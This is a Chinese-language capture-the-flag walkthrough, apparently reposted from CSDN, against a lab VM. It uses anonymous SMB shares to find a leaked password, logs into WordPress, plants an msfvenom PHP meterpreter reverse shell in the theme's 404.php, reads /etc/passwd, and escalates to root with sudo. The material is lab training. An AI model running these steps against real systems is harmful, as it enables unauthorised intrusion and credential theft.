CTF-SMB信息泄露

本文阅读 2 分钟
首页 安全分享,WEB安全 正文

SMB协议是基于TCP-NETBIOS下的,一般端口使用为139,445

SMB协议,计算机可以访问网络资源,下载对应的资源文件

kali 192.168.20.128

靶机 192.168.20.129

链接:https://pan.baidu.com/s/1inGR9A628icBnqcsHCnPYQ ; 提取码:4c5l 

nmap -sV ip 挖掘开放服务信息

nmap -A -v -T4 挖掘靶场全部信息

nmap -sV 192.168.20.129

img

分析探测结果

每一个服务对应计算机的一个端口,用来进行通信。常用端口0-1023端口,在扫描结果中查找特殊端口

针对特殊端口进行探测,尤其对开发大端口的http服务进行排查

针对SMB协议弱点分析

1.针对SMB协议,使用空口令,若口令尝试登陆,并查看敏感文件,下载查看;

smbclient -L ip

img

smbclient '\ipshare$'

print$和IPC$没有什么利用价值

img

get 敏感文件

img

img

发现疑似数据库密码的数据(Admin;togieMYSQL12345^^)

远程登录3306端口不行

img

远程登录22端口不行

img

2.针对SMB协议远程溢出漏洞进行分析

searchsploit samba版本号

img

发现没有远程溢出漏洞

img

针对http协议弱点分析

1.浏览器查看网站

2.使用dirb nikto探测

img

打开查看

img

利用密码登录

img

登陆网站

img

3.寻找突破点,目标登录后台,上传webshell

制作webshell

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.20.128 lport=4444 -f raw

img

制作webshell.php

img

启动监听

img

上传webshell

img

update file

img

img

获取反弹shell

选择twentyfifteen的原因

img

http://192.168.20.129/wordpress/wp-content/themes/twentyfifteen/404.php

img

img  

4.优化终端

python -c "import pty;pty.spawn('/bin/bash')"

img

5.查找用户名:cat /etc/passwd

img

6.查找密码:在共享目录下的敏感文件,提升权限

su 用户名

img

12345是之前deets.txt文件里的密码

sudo-l

img

sudo su

img

查看flag.txt(根目录下没找到flag.txt,所以查看proof.txt)

img

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/m0_63127854/article/details/124947934
-- 展开阅读全文 --
BUUCTF Web [极客大挑战 2019]Knife
« 上一篇 06-24
安全面试之XSS(跨站脚本攻击)
下一篇 » 07-24

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复